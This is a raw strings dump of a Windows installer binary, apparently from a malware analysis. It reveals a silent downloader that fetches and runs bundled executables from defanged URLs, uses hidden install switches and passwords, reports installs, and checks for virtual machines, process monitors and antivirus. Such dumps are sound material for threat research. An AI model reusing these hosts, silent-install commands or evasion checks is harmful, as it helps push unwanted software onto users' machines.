Failed to _unlink symlink `%s': %s

..\..\Src\Download\DownLoadTask.cpp

Converting %s...

Converted %d files in %.2f seconds.

Cannot convert links in %s: %s

Unable to delete `%s': %s

%d-%d

.orig

%d; URL=%s

Cannot back up %s as %s: %s

/index.html

Get %.0f%% [%d/%d]

%7.2f %s

%s: %s.

%.2f %s

Error in proxy URL %s: Must be HTTP.

Error parsing proxy URL %s: %s.

%d redirections exceeded.

unlink: %s

%s.%d

http_proxy

ftp_proxy

Removing %s since it should be rejected.

HTTP/

Reusing connection to %s:%hu.

Referer: %s

POST data file missing: %s

Content-Type: application/x-www-form-urlencoded

Failed writing HTTP request: %s.

%s %s HTTP/1.0

User-Agent: %s

Host: %s%s%s%s

Accept: %s

%s%s%s%s%s%s%s%s%s%s

%s request sent, awaiting response...

Read error (%s) in headers.

- %s

http-equiv=

Location: %s%s

Refusing to truncate existing file `%s'.

(%s to go)

Warning: wildcards not supported in HTTP.

File `%s' already there, will not retrieve.

(try:-)

--%s-- %s

%s => `%s'

Cannot write to `%s' (%s).

http1!

http2!

ERROR: Redirection (%d) without location.

%s ERROR %d: %s.

Server file no newer than local file `%s' -- not retrieving.

%s (%s) - `%s' saved [%ld/%ld]

%d %s

%s (%s) - `%s' saved [%ld]

%s URL:%s [%ld/%ld] -> "%s" [%d]

%s (%s) - Connection closed at byte %ld.

%s URL:%s [%ld] -> "%s" [%d]

%s (%s) - `%s' saved [%ld/%ld])

%s (%s) - Read error at byte %ld (%s).

%s (%s) - Connection closed at byte %ld/%ld.

%a, %d %b %Y %T

%s (%s) - Read error at byte %ld/%ld (%s).

%a, %d-%b-%Y %T

%A, %d-%b-%y %T

%s:%s

%a %b %d %T %Y

%s: Basic %s

username="%s", realm="%s", nonce="%s", uri="%s", response="%s"

Syntax error in Set-Cookie: %s at position %d.

Error in Set-Cookie, field `%s'

Cookie coming from %s attempted to set domain to %s

Cannot open cookies file `%s': %s

# Generated by Wget on %s.

# HTTP cookie file.

Error writing to `%s': %s

Error closing `%s': %s

Wget %s%s

%s%s.HLP

Wget [%.0f%%] %s

Starting WinHelp %s

SetThreadExecutionState

kernel32.dll

%Y-%m-%d

%a %b %e %H:%M:%S %Y

%m/%d/%y

%I:%M:%S %p

%H:%M:%S

%*s[ skipping %dK ]

=%%

Invalid dot style specification `%s'; leaving unchanged.

-%%

%7.2f%s

ETA %d:d:d

ETA d:d

http-equiv

%s: Cannot resolve incomplete link %s.

%s: Invalid URL %s: %s

Found %s in g_host_name_addresses_map (%p)

failed: %s.

Resolving %s...

Connecting to %s[%s]:%hu...

Unable to convert `%s' to a bind address. Reverting to ANY.

Connecting to %s:%hu...

Logging in as %s ...

%s@%s

The server refuses login.

Login incorrect.

==> TYPE %c ...

Unknown type `%c', closing control connection.

==> CWD %s ...

No such directory `%s'.

==> SIZE %s ...

couldn't connect to %s:%hu: %s

==> PORT ...

socket: %s

Bind error (%s).

Invalid PORT.

REST failed; will not truncate `%s'.

==> RETR %s ...

No such file `%s'.

No such file or directory `%s'.

accept: %s

[%s to go]

Length: %s

%s (%s) - Data connection: %s;

%s: %s, closing control connection.

%s (%s) -

File `%s' already there, not retrieving.

%s URL: %s [%ld] -> "%s" [%d]

.listing

Removed `%s'.

Skipping directory `%s'.

Remote file no newer than local file `%s' -- not retrieving.

Symlinks not supported, skipping symlink `%s'.

%s: corrupt time-stamp.

Remote file is newer than local file `%s' -- retrieving.

%s: unknown/unsupported file type.

%s/%s

Not descending to `%s' as it is excluded/not-included.

Rejecting `%s'.

No matches on pattern `%s'.

Wrote HTML-ized index to `%s'.

Wrote HTML-ized index to `%s' [%ld].

Cannot open %s: %s

Loading robots.txt; please ignore errors.

/robots.txt

.netrc

password

login

%s: %s:%d: warning: "%s" token appears before any machine name

%s: %s:%d: unknown token "%s"

%s%s%s

--> PASS Turtle Power!

--> %s

331 opiekey

331 s/key

PORT

%d,%d,%d,%d,%d,%d

WINDOWS_NT

Unsupported listing type, trying Unix listing parser.

%s%s%s@

Index of /%s on %s:%d

%d %s d

d:d

<a href="PTF://%s%s:%hu

(%s bytes)

-> %s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\JiSuZip

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\JiSuZip

boost::too_few_args: format-string referred to more arguments than were passed

boost::too_many_args: format-string referred to fewer arguments than were passed

asio.misc

asio.misc error

thread.entry_event

thread.exit_event

KERNEL32.DLL

Unsupported media type

HTTP version not supported

SOCKS unsupported version

SOCKS unsupported authentication version

SOCKS command not supported

Unknown HTTP error

d:d

httponly

Sync open url '

Connect to http proxy '

Unsupported proxy '

boost thread: trying joining itself

final_url

HKEY_LOCAL_MACHINE\SOFTWARE\KHT

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

?h=X-X-X-X-X-X&r=%s_%s%s&t=%s&hid=%s&v=%s --- adadsada

?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada

?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada

G:\SDK\poco-1.7.8-all\Foundation\include\Poco/SharedPtr.h

G:\SDK\poco-1.7.8-all\Foundation\include\Poco/String.h

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Rasapi32.dll

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

: this object doesn't support resynchronization

StreamTransformation: this object doesn't support random access

X-X-X-X-X-X

%d.%d.%d.%d

G:\SDK\poco-1.7.8-all\Foundation\include\Poco/RefCountedObject.h

%s: Couldn't find usable socket driver.

: this object doesn't support multiple channels

is not a valid key length

: this object does't support a special last block

0000000000000000

G:\pz_git\bin\Setup.pdb

.text$di

.text$mn

.text$x

.text$yd

.idata$5

.CRT$XCA

.CRT$XCAA

.CRT$XCC

.CRT$XCL

.CRT$XCU

.CRT$XCZ

.CRT$XIA

.CRT$XIAA

.CRT$XIAC

.CRT$XIC

.CRT$XIU

.CRT$XIZ

.CRT$XLA

.CRT$XLC

.CRT$XLZ

.CRT$XPA

.CRT$XPB

.CRT$XPX

.CRT$XPXA

.CRT$XPZ

.CRT$XTA

.CRT$XTU

.CRT$XTZ

.rdata

.rdata$T

.rdata$r

.rdata$sxdata

.rdata$zzzdbg

.rtc$IAA

.rtc$IZZ

.rtc$TAA

.rtc$TZZ

.xdata$x

.idata$2

.idata$3

.idata$4

.idata$6

.data

.data$r

.gfids$x

.gfids$y

.tls$

.tls$ZZZ

.rsrc$01

.rsrc$02

HttpQueryInfoA

InternetOpenUrlW

WININET.dll

SHLWAPI.dll

GetProcessHeap

CreateIoCompletionPort

KERNEL32.dll

USER32.dll

RegCloseKey

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

WS2_32.dll

IPHLPAPI.DLL

VERSION.dll

GetCPInfo

PeekNamedPipe

RegCreateKeyExW

RegDeleteKeyW

RegEnumKeyExW

RegOpenKeyExW

RegQueryInfoKeyA

ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE

.?AVstl_critical_section_concrt@details@Concurrency@@

.?AVHTTPRequest@Net@Poco@@

.?AVHTTPMessage@Net@Poco@@

.?AVHTTPResponse@Net@Poco@@

.?AVHTTPClientSession@Net@Poco@@

.?AVHTTPSession@Net@Poco@@

.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@

.?AVHTTPHeaderStreamBuf@Net@Poco@@

.?AVHTTPHeaderIOS@Net@Poco@@

.?AVHTTPHeaderInputStream@Net@Poco@@

.?AVHTTPHeaderOutputStream@Net@Poco@@

.?AVHTTPStreamBuf@Net@Poco@@

.?AVHTTPIOS@Net@Poco@@

.?AVHTTPInputStream@Net@Poco@@

.?AVHTTPOutputStream@Net@Poco@@

.?AVHTTPFixedLengthStreamBuf@Net@Poco@@

.?AVHTTPFixedLengthIOS@Net@Poco@@

.?AVHTTPFixedLengthInputStream@Net@Poco@@

.?AVHTTPFixedLengthOutputStream@Net@Poco@@

.?AVHTTPChunkedStreamBuf@Net@Poco@@

.?AVHTTPChunkedIOS@Net@Poco@@

.?AVHTTPChunkedInputStream@Net@Poco@@

.?AVHTTPChunkedOutputStream@Net@Poco@@

.?AVwindows_file_codecvt@@

.?AVunsupported_os@Concurrency@@

.?AVinvalid_scheduler_policy_key@Concurrency@@

.?AVinvalid_oversubscribe_operation@Concurrency@@

.?AVinvalid_operation@Concurrency@@

.?AUITopologyExecutionResource@Concurrency@@

.?AVExecutionResource@details@Concurrency@@

.?AUIExecutionResource@Concurrency@@

.?AUIExecutionContext@Concurrency@@

.?AVstl_condition_variable_concrt@details@Concurrency@@

.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@

.?AV?$sp_ms_deleter@Uhttp_stream_object@multi_download@avhttp@@@detail@boost@@

.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@

.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@

.?AV?$sp_counted_impl_pd@PAUhttp_stream_object@multi_download@avhttp@@V?$sp_ms_deleter@Uhttp_stream_object@multi_download@avhttp@@@detail@boost@@@detail@boost@@

.?AU_Crt_new_delete@std@@

.?AVhttp_stream@avhttp@@

.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@

.?AUstorage_interface@avhttp@@

.?AV?$bind_t@XV?$mf4@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@HABVerror_code@system@4@@_mfi@boost@@V?$list5@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@H@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$01@3@U?$arg@$00@3@@_bi@3@@_bi@boost@@

.?AVerror_category_impl@detail@avhttp@@

.?AV?$bind_t@XV?$mf3@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@ABVerror_code@system@4@@_mfi@boost@@V?$list4@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@H@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@

.?AV?$bind_t@XV?$mf3@XVmulti_download@avhttp@@HV?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@ABVerror_code@system@4@@_mfi@boost@@V?$list4@V?$value@PAVmulti_download@avhttp@@@_bi@boost@@V?$value@I@23@V?$value@V?$shared_ptr@Uhttp_stream_object@multi_download@avhttp@@@boost@@@23@U?$arg@$00@3@@_bi@3@@_bi@boost@@

.?AVdefault_storge@avhttp@@

.?AV?$sp_counted_impl_p@Udownload_stat@multi_download@avhttp@@@detail@boost@@

.?AV?$sp_counted_impl_pd@PAVhttp_stream@avhttp@@V?$sp_ms_deleter@Vhttp_stream@avhttp@@@detail@boost@@@detail@boost@@

.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@

.?AV?$sp_ms_deleter@Vhttp_stream@avhttp@@@detail@boost@@

.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@

.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@

.?AVSimpleKeyingInterface@CryptoPP@@

.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@

.?AVHexEncoder@CryptoPP@@

.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@

.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@

.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@

.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@

.?AVInvalidKeyLength@CryptoPP@@

c:\%original file name%.exe

<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />

3!4-42484B4L4W4q4}4

8!8-82888B8L8W8q8}8

3!3-32383B3L3W3q3}3

2%2S2

6%7X7

2 2$2(2,202

3 3$3(3,303

8!9/9>9{9

7(8,8084888

6 6$6(6_6

9 :5:::}:

: :$:(:,:0:4:8:<:@:

1 2$2(2,202

; ;$;(;,;0;4;8;~;

2(3,3034383<3

7074787 828

1,1014181

4 474=4:5

6g8d8

1 1$1(1,1014181<1

3 3)323}3

2 2$2(2,2024282<2@2

7$7(7,707

9 9$9(9,9

4 6$6(6,60646

2 2$2(2,2024282<2

3$3,383`3

; ;(;0;<;`;

-kernel32.dll

\\?\UNC\

ADVAPI32.DLL

combase.dll

advapi32.dll

minkernel\crts\ucrt\inc\corecrt_internal_strtox.h

__crt_strtox::floating_point_value::as_double

__crt_strtox::floating_point_value::as_float

..exe

mscoree.dll

ext-ms-win-ntuser-windowstation-l1-1-0

portuguese-brazilian

789:;<=>?

hXXp://xiaobingdou.com/reportInstallaa.aspx

"%s" %s

hXXp://xiaobingdou.com/reportInstallaaFinish.aspx

32:HKEY_CURRENT_USER\Software\Tencent\qqlive;64:HKEY_CURRENT_USER\Software\Tencent\qqlive

hXXp://down.yeadesktop.com/offer/thundersetup.exe

hXXp://down2.uc.cn/pcbrowser/down.php?pid=4722

hXXp://down2.uc.cn/pcbrowser/down.php?pid=4043

32:HKEY_CURRENT_USER\Software\UCBrowserPID;64:HKEY_CURRENT_USER\Software\UCBrowserPID

32:HKEY_LOCAL_MACHINE\SOFTWARE\KHT;64:HKEY_LOCAL_MACHINE\SOFTWARE\KHT

/VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=pop3

hXXp://quadratempbayinfo.com/data/webfriend2.exe

hXXp://down.yeadesktop.com/offer/msiql.exe

hXXp://down.yeadesktop.com/offer/service.exe

hXXp://down.yeadesktop.com/offer/conhostx64.exe

hXXp://down.yeadesktop.com/offer/conhostx86.exe

32:HKEY_CURRENT_USER\Software\haitao;64:HKEY_CURRENT_USER\Software\haitao

hXXp://dl-o.1haitao.com/20002.exe

hXXp://coa.wocaoniubia.com/sss/SafeLockSetup_auto_6009.exe

hXXp://xiaobingdou.com/anzhuang.aspx

hXXp://xiaobingdou.com/jihuo.aspx

QQ.exe

procexp.exe

taskmgr.exe

AvastUI.exe

hXXp://down.yeadesktop.com/offer/test.exe

hXXp://down.yeadesktop.com/offer/tezt.exe

32:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra;64:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra

hXXp://b3-31d2.kxcdn.com/B3.exe

testcpu

000000000000000

Kuaizip.lnk

MaohaWiFi.lnk

Chrome_WidgetWin_1

\Microsoft\Windows\Start Menu\Programs\

%s\%s

32:HKEY_CURRENT_USER\Software\tttttt;64:HKEY_CURRENT_USER\Software\tttttt

hXXp://down.yeadesktop.com/offer/setup.exe

"%s" {8118C270CE041EA78C556FEF4C12EE48}

4 : CreateProcessErr2:%d

"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=pop1

32:HKEY_CURRENT_USER\Software\PC Clean Plus;64:HKEY_CURRENT_USER\Software\PC Clean Plus

hXXp://plugpackdownload.net/Pack/Download/Setup.exe

"%s" /VERYSILENT /PA=benmedia /CH=001 /N=15150

"%s" /VERYSILENT /PA=benmedia /CH=001 /N=13400

d\

/iplookup/iplookup.php

hXXp://int.dpool.sina.com.cn

?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada

?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada

TEST%d

hXXp://cdn3.optimizely.com/js/geo2.js

edddddd

VBoxTray.exe

VBoxService.exe

VMwareUser.exe

VMwareTray.exe

VMUpgradeHelper.exe

vmtoolsd.exe

vmacthlp.exe

Portuguese(Brazilian)

Portuguese(Standard)

Portugal

Turkey

%d / %d

Download failed:%d

GOOGLE CHROME

WebOptimum

\StringFileInfo\x\%s

#{ad498944-762f-11d0-8dcb-00c04fc3358c}

msiql.exe_1660:

.text

`.rdata

@.data

.rsrc

@.reloc

j.Yf;

_tcPVj@

.PjRW

t.hp/P

t.hp\P

t.hXOP

j.hp:L

(%d),

(%d)================================

XC_WEB

(00356783465456)

XEle_IsShowEle

=xcgui_debug.txt

[%Y-%m-%d-%X]

(%d),name(%s)

API:%s()

,[%s]

=RegDeleteKeyExW

%d/%d/%d d:d:d

Module %d

Image Base: 0xx Image Size: 0xx

Checksum: 0xx Time Stamp: 0xx

File Size: %-10d File Time: %s

Company: %s

Product: %s

FileDesc: %s

FileVer: %d.%d.%d.%d

ProdVer: %d.%d.%d.%d

Error occurred at %s.

%s, run by %s.

Operating system: %s (%s).

%d processor(s), type %d.

%d%% memory in use.

%d MBytes physical memory.

%d MBytes physical memory free.

%d MBytes paging file.

%d MBytes paging file free.

%d MBytes user address space.

%d MBytes user address space free.

a Float Denormal Operand

a Float Invalid Operation

0xx:

EDI: 0xx ESI: 0xx EAX: 0xx

EBX: 0xx ECX: 0xx EDX: 0xx

EIP: 0xx EBP: 0xx SegCs: 0xx

EFlags: 0xx ESP: 0xx SegSs: 0xx

ERRORLOG.TXT

Error creating exception report

%s caused %s (0xx)

in module %s at x:x.

Exception handler called in %s.

%s location x caused an access violation.

===== [end of %s] =====

CRASH.DMP

unknown Windows version

%u.%u.%u

Windows 95

Windows 95 SP1

Windows 95 OSR2

Windows 98

Windows 98 SP1

Windows 98 SE

Windows ME

Windows NT 3.51

Windows NT 4

Windows 2000

Windows XP

Windows 2003 Server

Windows CE

\StringFileInfo\xx\%s

F%D,3

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

Visual C   CRT: Not enough memory to complete call to strerror.

Operation not permitted

Inappropriate I/O control operation

Broken pipe

operator

GetProcessWindowStation

MaxPolicyElementKey

pExecutionResource

Property not supported

src\DateTime.cpp

